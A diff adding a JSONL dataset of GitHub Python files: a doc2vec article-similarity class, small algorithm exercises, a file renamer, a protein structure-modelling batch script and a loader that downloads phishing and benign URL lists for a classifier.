diff --git "a/5054.jsonl" "b/5054.jsonl" new file mode 100644--- /dev/null +++ "b/5054.jsonl" @@ -0,0 +1,883 @@ +{"seq_id":"18677300698","text":"from gensim.models import Doc2Vec\nfrom gensim import matutils\n\n\nfrom technews_nlp_aggregator.nlp_model.common import defaultTokenizer\nfrom technews_nlp_aggregator.common.util import get_start_and_end\nMODEL_FILENAME = 'doc2vec'\nimport pandas as pd\n\nimport numpy as np\nfrom gensim.models.doc2vec import TaggedDocument\nfrom datetime import timedelta\nimport logging\n\n\nclass LabeledLineSentence(object):\n def __init__(self, idxlist, texts):\n self.doc_list = idxlist\n self.texts = texts\n\n def __iter__(self):\n for idx, text in zip(self.doc_list, self.texts):\n wtok = text\n tags = [idx]\n\n yield TaggedDocument(words=wtok, tags=tags)\n\n\nclass Doc2VecFacade():\n\n def __init__(self, model_dir, article_loader=None, gramFacade=None, tokenizer=None, window=10, min_count=5, sample=0.001, epochs=30, alpha=0.1, vector_size=400, batch_size=10000, queue_factor=2, workers=8, version=1):\n\n self.model_dir = model_dir\n self.article_loader = article_loader\n self.name=\"DOC2VEC-V\"+str(version)\n self.gramFacade = gramFacade\n self.tokenizer = defaultTokenizer if not tokenizer else tokenizer\n self.window=window\n self.min_count=min_count\n self.sample = sample\n self.epochs = epochs\n self.alpha = alpha\n self.vector_size = vector_size\n self.batch_size = batch_size\n self.queue_factor = queue_factor\n self.workers = workers\n\n def load_models(self):\n model_filename = self.model_dir+'/'+MODEL_FILENAME\n self.model = Doc2Vec.load(model_filename)\n\n def get_vector(self, doc, title='', merge_unlemmaed=False):\n tokenized_doc = self.get_tokenized(doc=doc, title=title, merge_unlemmaed=merge_unlemmaed)\n return self.get_vector_from_tokenized(tokenized_doc)\n\n\n def get_vector_from_tokenized(self, tokenized):\n infer_vector = self.model.infer_vector(tokenized, epochs=self.epochs, alpha=self.alpha)\n logging.debug(\"DOC2VEC: infer_vector {} has shape {}\".format(infer_vector, infer_vector.shape))\n return infer_vector\n\n\n\n def get_score_id_id(self, id1, id2):\n docvec1 = self.model.docvecs.doctag_syn0[id1]\n docvec1 = matutils.unitvec(docvec1)\n docvec2 = self.model.docvecs.doctag_syn0[id2]\n docvec2 = matutils.unitvec(docvec2)\n\n return np.dot(docvec1, docvec2.T)\n\n def get_score_doc_doc(self, tok1, tok2):\n\n docvec1 = self.get_vector_from_tokenized(tok1)\n docvec1 = matutils.unitvec(docvec1)\n docvec2 = self.get_vector_from_tokenized(tok2)\n\n docvec2 = matutils.unitvec(docvec2)\n if (len(docvec1) == len(docvec2)):\n return np.dot(docvec1, docvec2.T)\n else:\n return 0\n\n def get_tokenized(self, doc, title, merge_unlemmaed=False):\n wtok = self.tokenizer.tokenize_doc(title=title, doc=doc, do_lemma=True)\n if merge_unlemmaed:\n wtok += self.tokenizer.tokenize_doc(title=title, doc=doc, do_lemma=False)\n p_wtok = self.gramFacade.phrase(wtok)\n logging.debug(\"doc2vec_facade.get_tokenized returns {}\".format(p_wtok))\n return p_wtok\n\n def get_related_articles_and_score_doc(self, doc, title= '', start=None, end=None, merge_unlemmaed=False):\n infer_vector = self.get_vector(doc, title, merge_unlemmaed=merge_unlemmaed)\n articleModelDF = self.article_loader.articlesDF.iloc[:self.model.docvecs.doctag_syn0.shape[0]]\n if (start and end):\n interval_condition = (articleModelDF ['date_p'] >= start) & (articleModelDF ['date_p'] <= end)\n articlesFilteredDF = articleModelDF [interval_condition]\n dindex = articlesFilteredDF.index\n indexer = 
DocVec2Indexer(self.model.docvecs,dindex )\n scores = self.model.docvecs.most_similar([infer_vector], topn=None, indexer=indexer)\n\n else:\n scores = self.model.docvecs.most_similar([infer_vector], topn=None)\n articlesFilteredDF = articleModelDF\n dindex = articlesFilteredDF.index\n\n args_scores = np.argsort(-scores)\n new_index = articlesFilteredDF.iloc[args_scores].index\n df = pd.DataFrame(scores[args_scores], index=new_index, columns=['score'])\n return df\n\n def get_related_articles_for_id(self, id, d_days):\n articleDF = self.article_loader.articlesDF.iloc[:self.model.docvecs.doctag_syn0.shape[0]]\n url_date = articleDF.iloc[id]['date_p']\n\n\n start, end = get_start_and_end(url_date, d_days)\n interval_condition = (articleDF['date_p'] >= start) & (articleDF['date_p'] <= end)\n\n articlesFilteredDF = articleDF[interval_condition]\n logging.info(\n \"DOC2Vec: Found {} articles similar to {} between {} and {} \".format(len(articlesFilteredDF ), id, start, end))\n\n dindex = articlesFilteredDF.index\n indexer = DocVec2Indexer(self.model.docvecs, dindex)\n scores = self.model.docvecs.most_similar([id], topn=None, indexer=DocVec2Indexer(self.model.docvecs, dindex))\n args_scores = np.argsort(-scores)\n new_index = articlesFilteredDF.iloc[args_scores].index\n df = pd.DataFrame(scores[args_scores], index=new_index , columns=['score'])\n return df\n\n def create_model(self, texts):\n it = LabeledLineSentence(range(len(texts)), texts)\n logging.info(\"Creating model with {} texts\".format(len(texts)))\n self.model = Doc2Vec(size=self.vector_size, window=self.window, workers=self.workers, alpha=self.alpha, min_alpha=0.0001,\n epochs=self.epochs, min_count=self.min_count, sample=self.sample, batch_words=self.batch_size) # use fixed learning rate\n self.model.build_vocab(it)\n\n logging.info(\"Starting to train......\")\n\n self.model.train(it, total_examples=self.model.corpus_count, epochs=self.epochs, queue_factor=self.queue_factor)\n\n logging.info(\"Training completed, saving to \" + self.model_dir)\n self.model.save(self.model_dir + MODEL_FILENAME)\n\n def docs_in_model(self):\n return self.model.docvecs.doctag_syn0.shape[0]\n\n\nclass DocVec2Indexer():\n def __init__(self, doc2vec, dindex):\n self.doc2vec = doc2vec\n\n self.dindex = dindex\n\n\n\n def most_similar(self, mean, topn):\n dists = np.dot(self.doc2vec.doctag_syn0norm[self.dindex], mean)\n return dists\n","repo_name":"diegoami/newscollection","sub_path":"technews_nlp_aggregator/nlp_model/publish/doc2vec_facade.py","file_name":"doc2vec_facade.py","file_ext":"py","file_size_in_byte":6394,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"47"} +{"seq_id":"42374904031","text":"\"\"\"Show uptime of a service.\"\"\"\n\nimport time\n\n\ndef uptime(start_uptime: time.perf_counter) -> str:\n \"\"\"Return human readable time elapsed since program start.\n\n Example usage:\n ```\n import time\n start_uptime = time.perf_counter()\n print(uptime(start_uptime))\n ```\n\n Args:\n start_uptime: A perf_counter object which is equivalent of calling\n now().\n\n Returns:\n String of time elapsed.\n \"\"\"\n units = {\n \"months\": 2629746, \"weeks\": 604800, \"days\": 86400,\n \"hours\": 3600, \"minutes\": 60, \"seconds\": 1\n }\n\n elapsed_sec = time.perf_counter() - start_uptime\n\n result = \"\"\n for unit, count in units.items():\n value = int(elapsed_sec // count)\n if value >= 1:\n if value == 1:\n unit = unit.rstrip(\"s\")\n result += f\"{value} {unit}, \"\n elapsed_sec -= (count * value)\n 
return result.rstrip(\", \")\n","repo_name":"xcollantes/uptime","sub_path":"uptime.py","file_name":"uptime.py","file_ext":"py","file_size_in_byte":927,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"24337972458","text":"from collections import deque\nimport sys\n\ndef dfs(x, y):\n    # declare the up/down/left/right deltas\n    dx = [-1, 1, 0, 0]\n    dy = [0, 0, -1, 1]\n    stack = deque([(x, y)])\n    visited[x][y] = 1\n    while stack: # repeat until the stack is empty\n        x, y = stack.pop()\n        for d in range(4): # explore the 4 delta directions\n            nx = x + dx[d]\n            ny = y + dy[d]\n            # if (nx, ny) is inside arr, has the same color as (x, y), and was never visited -> mark it visited & push it onto the stack\n            if 0 <= nx < N and 0 <= ny < N and arr[x][y] == arr[nx][ny] and visited[nx][ny] == 0:\n                visited[nx][ny] = 1\n                stack.append((nx, ny))\n\nN = int(sys.stdin.readline())\narr = [list(sys.stdin.readline().strip()) for _ in range(N)]\ncnt, cnt_x = 0, 0 # as seen by a person without red-green color blindness / as seen by a person with it\n# as seen by a person without red-green color blindness\nvisited = [[0] * N for _ in range(N)]\nfor i in range(N):\n    for j in range(N):\n        if visited[i][j] == 0: # if never visited, dfs over the cells of the same color!!\n            dfs(i, j)\n            cnt += 1\n\n# as seen by a person with red-green color blindness (R / G are indistinguishable -> unify them, then dfs)\nvisited = [[0] * N for _ in range(N)] # reset the visited arr\nfor i in range(N):\n    for j in range(N):\n        if arr[i][j] == 'G':\n            arr[i][j] = 'R'\nfor i in range(N):\n    for j in range(N):\n        if visited[i][j] == 0:\n            dfs(i, j)\n            cnt_x += 1\n\nprint(cnt, cnt_x)\n","repo_name":"nyoungnyoung/Personal","sub_path":"Study/220905_Q10026_적록색약dfs.py","file_name":"220905_Q10026_적록색약dfs.py","file_ext":"py","file_size_in_byte":1574,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"31513994061","text":"import os \r\nimport re\r\n\r\n# problem statement \r\n# the user needs to remove the .html extension from all the files and save them without the extension \r\n\r\ndir_path = \"FULL PATH WHERE,HTML FILE EXIST\"\r\nfiles = os.listdir(dir_path)\r\n\r\nfor filename in files:\r\n    if \".html\" in filename:\r\n        # replace\r\n        new_name = re.sub(r'\.html$', '', filename) \r\n        os.rename(os.path.join(dir_path, filename), os.path.join(dir_path, new_name)) \r\n        \r\n        \r\n    else:\r\n        # do not replace \r\n        print(\"No Need\")","repo_name":"SyedSajjadHaider/LearnPython","sub_path":"rename.py","file_name":"rename.py","file_ext":"py","file_size_in_byte":454,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"21010079310","text":"import sys\ninput = sys.stdin.readline\nt = int(input())\nfor _ in range(t):\n\torigin, compare = input().split()\n\tprint('Distances:', end = ' ')\n\tfor i in range(len(origin)):\n\t\tif ord(origin[i]) <= ord(compare[i]):\n\t\t\tprint( ord(compare[i]) - ord(origin[i]) , end = ' ')\n\t\telse:\n\t\t\tprint( ord(compare[i])+ 26 - ord(origin[i]), end = ' ')\n\tprint()","repo_name":"LeeJin0527/algorithm","sub_path":"BaekJoon/문자열(Easy)/5218 알파벳 거리.py","file_name":"5218 알파벳 거리.py","file_ext":"py","file_size_in_byte":342,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"47"} +{"seq_id":"34726184932","text":"total = totmil = cont = menor = 0\nbarato = ''\n\nwhile True:\n    produto = str(input('Nome do produto: '))\n    preco = float(input('Preço: '))\n    cont += 1\n    total += preco\n    if preco > 1000:\n        totmil += 1\n    if cont == 1 or preco < menor:\n        menor = preco\n        barato = produto\n    resposta = ' '\n    while resposta not in 'SN':\n        resposta = str(input('Quer continuar[S/N]?'
)).upper().strip()[0]\n if resposta == 'N':\n break\nprint('{:-^40}'.format('Fim do Programa'))\nprint(f'O total da compra foi R${total}')\nprint(f'Temos {totmil} produtos que custam mais de R$1.000')\nprint(f'O produto mais barato foi {barato} que custa R${menor}')\n","repo_name":"renatocortez/ExerciciosPython","sub_path":"ex070.py","file_name":"ex070.py","file_ext":"py","file_size_in_byte":672,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"21038614895","text":"import sys\nimport time\n\n\nclass Solution:\n def fourSum(self, nums, target):\n \"\"\"\n :type nums: List[int]\n :type target: int\n :rtype: List[List[int]]\n \"\"\"\n if len(nums) == 0:\n return []\n sorted_nums = sorted(nums)\n\n start_time = time.time()\n result = self.sum_rec(sorted_nums, target, 4)\n # result = self.sum_rec_set(set(nums), target, 4)\n end_time = time.time()\n print(str(end_time - start_time))\n return list(result)\n\n def sum_rec(self, nums, target, n):\n if len(nums) < n or target < nums[0] * n or target > nums[-1] * n:\n return []\n elif n == 2:\n return self.two_sum_set(nums, target)\n else:\n this_rec_result = []\n i = 0\n while i < len(nums):\n val = nums[i]\n new_target = target - val\n new_nums = nums[i + 1:]\n rec_result = self.sum_rec(new_nums, new_target, n - 1)\n for ele in rec_result:\n this_rec_result.append([val] + ele)\n while i < len(nums) and nums[i] == val:\n i += 1\n return this_rec_result\n\n def two_Sum(self, nums, target):\n if len(nums) > 0:\n this_rec_result = []\n i, j = 0, len(nums) - 1\n while i < j:\n cur_i_val = nums[i]\n cur_j_val = nums[j]\n if cur_i_val + cur_j_val == target:\n this_rec_result.append([cur_i_val, cur_j_val])\n while nums[i] == cur_i_val and i < j:\n i += 1\n while nums[j] == cur_j_val and i < j:\n j -= 1\n elif cur_i_val + cur_j_val > target:\n while nums[j] == cur_j_val and i < j:\n j -= 1\n else:\n while nums[i] == cur_i_val and i < j:\n i += 1\n return this_rec_result\n else:\n return []\n\n def two_sum_set(self, nums, target):\n d = set()\n result = set()\n for ele in nums:\n if target - ele in d:\n result.add((target - ele, ele))\n d.add(ele)\n return [list(item) for item in result]\n\n\ndef main(*args):\n solution = Solution()\n result = solution.two_sum_set([0, 0, 0, 0], 0)\n # result = solution.fourSum(\n # [1, 0, -1, 0, -2, 2],\n # 0\n # )\n\n print(result)\n\n\nif __name__ == '__main__':\n main(*sys.argv[1:])\n","repo_name":"hooyao/Coding-Py3","sub_path":"LeetCode/Problems/18_4sum.py","file_name":"18_4sum.py","file_ext":"py","file_size_in_byte":2588,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"18520279869","text":"# test script\r\nimport os, sys\r\nimport errno\r\nimport gzip\r\nimport csv\r\nimport subprocess\r\nimport getopt\r\nimport logging\r\nimport time\r\n\r\ndefaultConfig = \"\"\"\r\npssh2_cache=\"/mnt/project/psshcache/result_cache_2014/\"\r\ntemp_work=\"/tmp/pssh2\"\r\nlocal_data=\"/var/tmp/rost_db/data/\"\r\nHHLIB=\"/usr/share/hhsuite/\"\r\n\"\"\"\r\n\r\n#default paths\r\nhhmmdir = '/usr/share/hhsuite/scripts/hhmakemodel.pl' \r\ndparam = '/mnt/project/aliqeval/HSSP_revisited/fake_pdb_dir/'\r\nmd5mapdir = '/mnt/project/pssh/pssh2_project/data/pdb_derived/pdb_redundant_chains-md5-seq-mapping'\r\nmayadir = '/mnt/home/andrea/software/mayachemtools/bin/ExtractFromPDBFiles.pl'\r\nmaxcldir = '/mnt/project/aliqeval/maxcluster'\r\n\r\ncleanup = True\r\n\r\n\r\ndef process_hhr(path, checksum, spath, sname):\r\n\thhrfile = 
gzip.open(path, 'rb')\r\n\ts = hhrfile.read()\t\r\n\t\r\n\ttry:\r\n\t\tos.makedirs(spath)\r\n\texcept OSError as exception:\r\n\t\tif exception.errno != errno.EEXIST:\r\n\t\t\traise\r\n\t\t\t\r\n\t\r\n\topen(spath+'/'+sname, 'w').write(s)\r\n\tparsefile = open(spath+'/'+sname, 'rb')\r\n\tlinelist = parsefile.readlines()\r\n\t\r\n\t#setting up loop vars\r\n\tbreaker = False\r\n\ti = -1\r\n\t\r\n\twhile (breaker==False):\r\n\t\ti = i - 1\r\n\t\tif (\"No \" in linelist[i]) and (len(linelist[i])<10):\r\n\t\t\tbreaker=True\r\n\t\t\r\n\t\ttakenline = linelist[i]\r\n\r\n\titerationcount = int(float(takenline.split(' ')[1]))\r\n\tprint('-- '+str(iterationcount)+' matching proteins found!')\r\n\t\r\n\r\n\thhrfile.close()\r\n\tparsefile.close()\r\n\treturn linelist, iterationcount\r\n\t\r\n\r\ndef proteins(md5):\r\n\tcsvfilename = 'result_'+md5\r\n\tchecksum = md5\r\n\t\r\n\t#set run-time paths\r\n\thhrpath = ('/mnt/project/aliqeval/HSSP_revisited/result_cache_2014/'+checksum[0:2]+'/'+checksum[2:4]+'/'+checksum+'/query.uniprot20.pdb.full.hhr.gz')\r\n\tsname = os.path.basename(hhrpath)[:-3]\r\n\tspath = '/mnt/project/aliqeval/HSSP_revisited/dinhtest/models/'+checksum[0:2]+'/'+checksum[2:4]+'/'+checksum\r\n\t\r\n\tif not (os.path.isfile(hhrpath)):\r\n\t\tprint('-- hhr does not exist, check md5 checksum!\\n-- stopping execution...')\r\n\t\treturn\r\n\tprint('-- hhr file found. Calling hhmakemodel to create pdb model...') \r\n\thhrdata = (process_hhr(hhrpath, checksum, spath, sname))\r\n\thhrlines, modelcount = hhrdata\r\n\t\r\n\t#hhmakemodel call, creating the models\r\n\tfor model in range(1, modelcount+1):\r\n\t\tprint('-- building model for protein '+str(model))\r\n\t\tsubprocess.call([hhmmdir, '-i '+spath+'/'+sname, '-ts '+spath+'/query.uniprot20.pdb.full.'+str(model)+'.pdb', '-d '+dparam,'-m '+str(model)])\r\n\r\n\t#grep md5 sum and get result back\r\n\tp = subprocess.Popen(['grep', checksum, md5mapdir], stdout=subprocess.PIPE, stderr=subprocess.PIPE)\r\n\tout, err = p.communicate()\r\n\tgrepresults = out.replace('\\t',' ').replace('\\n',' ').replace(' ',' ').strip().split(' ') #normalize the results from grepping\r\n\t\r\n\t#fool mayachemtools by creating a link to our .pdb...\r\n\t#ln -s /mnt/project/rost_db/data/pdb/entries/lj/pdb2lj7.ent experiment.pdb \r\n\r\n\tchainarray = [] #chain letters are being put into an array here\r\n\tfor v in range(len(grepresults)-2):\r\n\t\tchainarray.append(grepresults[v][-1:])\r\n\t\r\n\tresultArray = [[] for s in range(len(grepresults)-2)] #resultArray[m][n], m = index of chain (A = 0, B = 1...) n: 0 = model number, 1 = GDT, 2 = TM, 3 = RMSD\r\n\th = 0 #iterations through the chain array\r\n\tfor chain in chainarray: #iterating over how many chains we found\r\n\t\tpdbCode = grepresults[h][:-2]\r\n\t\tprint('-- creating .ent link to /mnt/project/rost_db/data/pdb/entries/'+grepresults[0][1:3]+'/pdb'+grepresults[0][:-2]+'.ent')\r\n\t\tif not os.path.isfile(spath+'/'+pdbCode+'.pdb'):\r\n\t\t\tsubprocess.call(['ln', '-s', '/mnt/project/rost_db/data/pdb/entries/'+grepresults[0][1:3]+'/pdb'+grepresults[0][:-2]+'.ent', spath+'/'+pdbCode+'.pdb'])\r\n\t\t\tprint('-- link created!')\r\n\t\telse:\r\n\t\t\tprint('-- link already exists. 
Using existing link...')\r\n\t\r\n\t\tsubprocess.call([mayadir, '-m', 'Chains', '-c', chain, spath+'/'+pdbCode+'.pdb'])\r\n\t\tsubprocess.call([mayadir, '-m', 'CAlphas', pdbCode+'Chain'+chain+'.pdb'])\r\n\t\t\r\n\t\t#maxcluster gdt comparison\r\n\t\tprint('-- performing maxcluster comparison, output to maxclres.log')\r\n\t\t#subprocess.call([maxcldir, '-gdt', '-e', 'experimentChainACAlphas.pdb', '-p', spath+'/query.uniprot20.pdb.full.1.pdb', '-log', 'maxclres.log'])\r\n\r\n\t\tfor i in range (1, modelcount+1): #iterating over the single models\r\n\t\t\tp = subprocess.Popen([maxcldir, '-gdt', '4', '-e', pdbCode+'Chain'+chain+'CAlphas.pdb', '-p', spath+'/query.uniprot20.pdb.full.'+str(i)+'.pdb'], stdout=subprocess.PIPE, stderr=subprocess.PIPE)\r\n\t\t\t\r\n\t\t\tprint('-- maxCluster\\'d chain '+chain+ ' with model no. '+str(i))\r\n\t\t\t\r\n\t\t\tout, err = p.communicate()\r\n\t\t\t\r\n\t\t\tres = open('maxclres.log', 'a')\r\n\t\t\tres.write('== results for Chain '+chain+' compared to model '+str(i)+':\\n')\r\n\t\t\tres.write(out)\r\n\t\t\ttime.sleep(0.05)\r\n\t\t\r\n\t\tres.close()\r\n\t\ttime.sleep(2)\r\n\t\twith open('maxclres.log') as g:\r\n\t\t\tlines = g.readlines()\r\n\t\t\t\r\n\t\t#we have the chain letter currently available in the iteration, so we will just iterate over the result here\r\n\t\tprint('-- we got '+str(len(lines))+' lines')\r\n\t\tfor lineNo in range(0, len(lines)):\r\n\t\t\tif '== results for Chain '+chain+' compared to model' in lines[lineNo]:\r\n\t\t\t\tbrk = False\r\n\t\t\t\tit = 0\r\n\t\t\t\twhile brk == False:\r\n\t\t\t\t\tit = it+1\r\n\t\t\t\t\tif 'GDT=' in lines[lineNo+it]:\r\n\t\t\t\t\t\tbrk = True\r\n\t\t\t\t\t\tgdt = lines[lineNo+it].replace('GDT=','').strip()\r\n\t\t\t\t\r\n\t\t\t\trmsd = 0.000\r\n\t\t\t\ttm = 0.000\r\n\t\t\t\tif 'GDT= ' not in lines[lineNo+1]:\r\n\t\t\t\t\trmsd = lines[lineNo+1][26:31]\r\n\t\t\t\t\ttm = lines[lineNo+1][74:-2]\r\n\t\t\t\t\r\n\t\t\t\tresultArray[h].append((int((lines[lineNo].split(' ')[8])[:-2]), gdt, tm, rmsd))\r\n\t\th = h +1\r\n\t#create csvfile and writer object\r\n\tcsvfile = open(csvfilename+'.csv', 'w')\r\n\tcsvWriter = csv.writer(csvfile, delimiter=',')\r\n\tcsvWriter.writerow(['md5 checksum', 'Hit code', 'model number', 'avg. GDT', 'avg. TM', 'avg. 
RMSD', 'Prob.', 'E-value', 'P-value', 'HH score', 'Columns', 'Query HMM', 'Template', 'HMM'])\r\n\t\r\n\t\r\n\tfor i in range (modelcount): #iterating over the resultArray for every model\r\n\t\tprint(str(i)+' of modelcount = '+str(modelcount))\r\n\t\tavgGDT =0.000\r\n\t\tavgTM = 0.000\r\n\t\tavgRMSD = 0.000\r\n\t\tchainCount = 0\r\n\t\tfor j in range(len(chainarray)): #iterating for every chain\r\n\t\t\tif not float(resultArray[j][i][1])+float(resultArray[j][i][3])==0.000:\r\n\t\t\t\tchainCount += 1\r\n\t\t\t\tavgGDT += float(resultArray[j][i][1])\r\n\t\t\t\tavgTM += float(resultArray[j][i][2])\r\n\t\t\t\tavgRMSD += float(resultArray[j][i][3])\r\n\t\tblitsParseLine = hhrlines[9+i][36:]\r\n\t\tblitsParseLine = blitsParseLine.replace('(',' ')\r\n\t\tblitsParseLine = blitsParseLine.replace(')',' ')\r\n\t\twhile ' ' in blitsParseLine:\r\n\t\t\tblitsParseLine = blitsParseLine.replace(' ', ' ')\r\n\t\tblitsParseLine = blitsParseLine.split(' ')\r\n\r\n\t\tif avgGDT + avgRMSD == 0.000:\r\n\t\t\tcsvWriter.writerow([checksum, hhrlines[9+i][4:10], str(i+1), 'n/a', 'n/a', 'n/a', blitsParseLine[0], blitsParseLine[1], blitsParseLine[2], blitsParseLine[3], blitsParseLine[5], blitsParseLine[6], blitsParseLine[7], blitsParseLine[8]])\r\n\t\telse:\r\n\t\t\tcsvWriter.writerow([checksum, hhrlines[9+i][4:10], str(i+1), str(avgGDT/float(chainCount)), str(avgTM/float(chainCount)), str(avgRMSD/float(chainCount)), blitsParseLine[0], blitsParseLine[1], blitsParseLine[2], blitsParseLine[3], blitsParseLine[5], blitsParseLine[6], blitsParseLine[7], blitsParseLine[8]])\r\n\t\r\n\tcsvfile.close()\r\n\t\t\r\n\r\n#clean up everything\r\n\r\n\tif cleanup == True:\r\n\t\tprint('-- cleanup in 3 seconds...')\r\n\t\ttime.sleep(3)\r\n\t\tprint('-- deleting '+sname)\r\n\t\tsubprocess.call(['rm', spath+'/'+sname])\r\n\t\t\r\n\t\tprint('-- deleting '+sname[:-4]+'.*.pdb')\r\n\t\tfor z in range(1, modelcount+1):\r\n\t\t\tsubprocess.call(['rm', '-f', spath+'/'+sname[:-3]+str(z)+'.pdb'])\r\n\t\t\r\n\t\tprint('-- deleting mayachemtools pdbs')\r\n\t\tsubprocess.call(['rm', spath+'/'+pdbCode+'.pdb'])\r\n\t\tfor chain in chainarray: #iterating over how many PDBs we found\r\n\t\r\n\t\t\tsubprocess.call(['rm', pdbCode+'Chain'+chain+'.pdb'])\r\n\t\t\tsubprocess.call(['rm', pdbCode+'Chain'+chain+'CAlphas.pdb'])\r\n\t\t\r\n\tprint('-- deleting maxclres.log')\r\n\tsubprocess.call(['rm', 'maxclres.log'])\r\n\t\t\r\ndef usage():\r\n\tprint(\"Command line parameters for the proteins script:\")\r\n\tprint(\"-h/--help Displays this message\\n-m/--md5 Path to list of md5 sums of proteins to analyze.\")\r\n\tprint(\"-k/--keep Keep every model generated with the script. 
By default, models are deleted after analysis.\")\r\n\t\t\r\n\t\r\ndef main(argv):\r\n\tmd5path = 'foo'\r\n\ttry:\r\n\t\topts, args = getopt.getopt(argv, \"hm:kd\", [\"help\", \"md5=\", \"keep\"])\r\n\texcept getopt.GetoptError:\r\n\t\tusage()\r\n\t\tsys.exit(2)\r\n\tif len(argv)<2:\r\n\t\tusage()\r\n\t\tsys.exit(2)\r\n\tfor opt, arg in opts:\r\n\t\tif opt in (\"-h\", \"--help\"):\r\n\t\t\tusage()\r\n\t\t\tsys.exit(2)\r\n\t\telif opt in (\"-m\", \"--md5\"):\r\n\t\t\tmd5path = arg\r\n\t\telif opt in (\"-k\", \"--keep\"):\r\n\t\t\tcleanup = False\r\n\t\r\n\tmd5listfile = open(md5path, 'rb')\r\n\tmd5list = md5listfile.readlines()\r\n\tfor chksm in md5list:\r\n\t\tproteins(chksm.replace(\"\\n\",\"\"))\r\n\t\r\n\r\n\r\nif __name__ == '__main__':\r\n\tmain(sys.argv[1:])\r\n\r\n\r\n\r\n\r\n\r\n\"\"\"\r\ntodo:\r\n- automate md5 checksum input (list)\r\n\"\"\"\r\n","repo_name":"aschafu/PSSH2","sub_path":"src/python/hssp_revisited/pythonscript_batch.py","file_name":"pythonscript_batch.py","file_ext":"py","file_size_in_byte":8892,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"38937514365","text":"import zipfile, urllib.request, shutil\nimport pandas as pd\nfrom pathlib import Path\n\n\nclass Data:\n\n    _default_options = {\"unsafe\": True,\n                        \"safe\": True,\n                        \"top-1m\": True,\n                        \"tld-stats\": True}\n\n    def __init__(self, options=None):\n        print(\"Init Data class\")\n        if options is None:\n            options = self._default_options\n        self._data = {}\n        self._get_raw_datasets(options)\n\n    def get_data(self):\n        return self._data\n\n    def _get_raw_datasets(self, options):\n        if options[\"unsafe\"] or options[\"safe\"]: self._get_urls()\n        if options[\"unsafe\"]: self._get_unsafe_urls()\n        if options[\"top-1m\"]: self._get_safe_urls_top_1_million()\n        if options[\"safe\"]: self._get_safe_urls()\n        if options[\"tld-stats\"]: self._get_tld_stats()\n\n    def _get_tld_stats(self):\n        print(\"Retrieve tld stats database\")\n\n        # remote https://w3techs.com/technologies/overview/top_level_domain/all\n        local = \"./data/tld-stats.csv\"\n        try:\n            Path(local).resolve(strict=True)\n            df = pd.read_csv(local, header=None)\n            self._data[\"tld-stats\"] = dict(df.values)\n        except FileNotFoundError:\n            print(\"Cannot find\", local)\n\n    def _get_unsafe_urls_phishtank(self):\n        remote = \"http://data.phishtank.com/data/online-valid.csv\"\n        print(\"[UNSAFE] Retrieve PhishTank database\")\n        df = pd.read_csv(remote)\n        df = df[df['verified'] == 'yes']\n        df = df[df['online'] == 'yes']\n        return df.iloc[:, 1]\n\n    def _get_unsafe_urls_cybercrime(self):\n        print(\"[UNSAFE] Retrieve CyberCrime database\")\n        remote = \"http://cybercrime-tracker.net/all.php\"\n        return pd.read_csv(remote, header=None)\n\n    def _get_unsafe_urls_unb(self):\n        print(\"[UNSAFE] Retrieve University of New Brunswick Canadian Institute for Cybersecurity database\")\n        local = \"./data/FinalDataset/URL/phishing_dataset.csv\"\n        return pd.read_csv(local, header=None)\n\n    def _get_unsafe_urls(self):\n        print(\"[UNSAFE] Retrieve unsafe urls database\")\n\n        local = \"./data/unsafe.csv\"\n        try:\n            Path(local).resolve(strict=True)\n        except FileNotFoundError:\n            df = self._get_unsafe_urls_phishtank()\n            df = df.append(self._get_unsafe_urls_cybercrime(), ignore_index=True)\n            df = df.append(self._get_unsafe_urls_unb(), ignore_index=True)\n            df.to_csv(local, sep=',', encoding='utf-8', header=None, index=False)\n        else:\n            df = pd.read_csv(local)\n        self._data[\"unsafe\"] = df\n\n    def _get_urls(self):\n        print(\"[SAFE|UNSAFE] Retrieve 
safe/unsafe urls database\")\n\n local = \"./data/ISCXURL2016.zip\"\n try:\n Path(local).resolve(strict=True)\n except FileNotFoundError:\n remote = \"https://iscxdownloads.cs.unb.ca/iscxdownloads/ISCX-URL-2016/ISCXURL2016.zip\"\n with urllib.request.urlopen(remote) as response, open(local, 'wb') as out_file:\n shutil.copyfileobj(response, out_file)\n with zipfile.ZipFile(local) as zf:\n zf.extractall(\"./data\")\n\n def _get_safe_urls_top_1_million(self):\n print(\"[SAFE] Retrieve top 1 million websites database\")\n local = \"./data/top-1m.csv\"\n try:\n Path(local).resolve(strict=True)\n except FileNotFoundError:\n remote = \"http://s3.amazonaws.com/alexa-static/top-1m.csv.zip\"\n df = pd.read_csv(remote, compression='zip', header=None)\n df.to_csv(local, sep=',', encoding='utf-8', header=None, index=False)\n else:\n df = pd.read_csv(local, header=None)\n self._data[\"top-1m\"] = dict(map(reversed, dict(df.values).items()))\n return df\n\n def _get_safe_urls_unb(self):\n print(\"[SAFE] Retrive University of New Brunswick Canadian Institute for Cybersecurity database\")\n local = \"./data/FinalDataset/URL/Benign_list_big_final.csv\"\n return pd.read_csv(local, header=None)\n\n def _get_safe_urls(self):\n print(\"[SAFE] Retrieve safe urls database\")\n\n local = \"./data/safe.csv\"\n try:\n Path(local).resolve(strict=True)\n except FileNotFoundError:\n df = self._get_safe_urls_top_1_million()\n df = df.iloc[:, 1]\n df = df.append(self._get_safe_urls_unb(), ignore_index=True)\n df.to_csv(local, sep=',', encoding='utf-8', header=None, index=False)\n else:\n df = pd.read_csv(local)\n self._data[\"safe\"] = df\n","repo_name":"valkheim/url-classifier","sub_path":"data/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":4611,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"25713049413","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Apr 16 10:37:47 2019\r\n\r\n@author: m\r\n\"\"\"\r\nimport 